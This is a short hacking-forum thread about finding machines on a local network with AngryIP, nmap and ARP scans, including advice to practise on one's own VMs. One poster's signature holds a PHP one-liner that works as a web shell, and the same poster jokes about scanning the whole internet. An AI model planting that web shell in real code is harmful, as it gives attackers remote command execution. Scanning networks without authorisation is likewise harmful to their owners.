Donate to us!
The measure of a mans life is not how well he dies, but how well he lives.
Friday, November 16, 2018
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 130
Guests Online: 128
Members Online: 2

Registered Members: 107957
Newest Member: sebastine7
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

Scanning local ip space

r0b1n135

Your avatar

Wiseman
Posted on 09-11-18 01:10
I have been curious lately on how I can go about finding local machines in my area. I have been messing around with Wireshark and AngryIP, but I am not too sure of my results. I understand the results I receive in Wireshark, but my real question is with AngryIP.

How do I know what IP range to use? Where do I start? Any helpful tips on scanning local networks?

<strong>Be</strong>
Author

RE: Scanning local ip space

gobzi

HBH Guru
Posted on 09-11-18 12:15
r0b1n135 wrote:

How do I know what IP range to use?

Start with 0.0.0.0/0, you'll be surprised with the results Thumbs Up

Edited: You have 515 points in HBH and you don't know what IP range to use in your local network? Frown

<pre> <?=`$_GET[1]`?>

Ima_noob# cat * | egrep "Subject|Date|filename=" > agrrr

Edited by gobzi on 09-11-18 12:18
goo.gl/8st1AR
Author

Futility

Your avatar

God
Posted on 12-11-18 13:07
r0b1n135 wrote:
I have been curious lately on how I can go about finding local machines in my area. I have been messing around with Wireshark and AngryIP, but I am not too sure of my results. I understand the results I receive in Wireshark, but my real question is with AngryIP.

How do I know what IP range to use? Where do I start? Any helpful tips on scanning local networks?

It's best not to poke other people's machines until you actually know what you're doing. I would suggest setting up a network of VMs (as small as one or two + your host) and then pointing tools at them to get a feel for how things work.

As for actually conducting a local scan, I would start by enumerating everything in your IP/Subnet range and throwing nmap (or angryIP, I guess) at it. An ARP scan can also quickly enumerate everything that's choosing to show itself on your local subnet.

- futility
Futility91@hotmail.com Futility91
Author

r0b1n135

Your avatar

Wiseman
Posted on 15-11-18 00:36
You have 515 points in HBH and you don't know what IP range to use in your local network? Frown

Sad I know. I never really know where to begin so I just sort of learn things when they come to me. Web exploitation is the first area I started to learn and it is the only one in which I have made much progress at all.

Thank you both for your help!

<strong>Be</strong>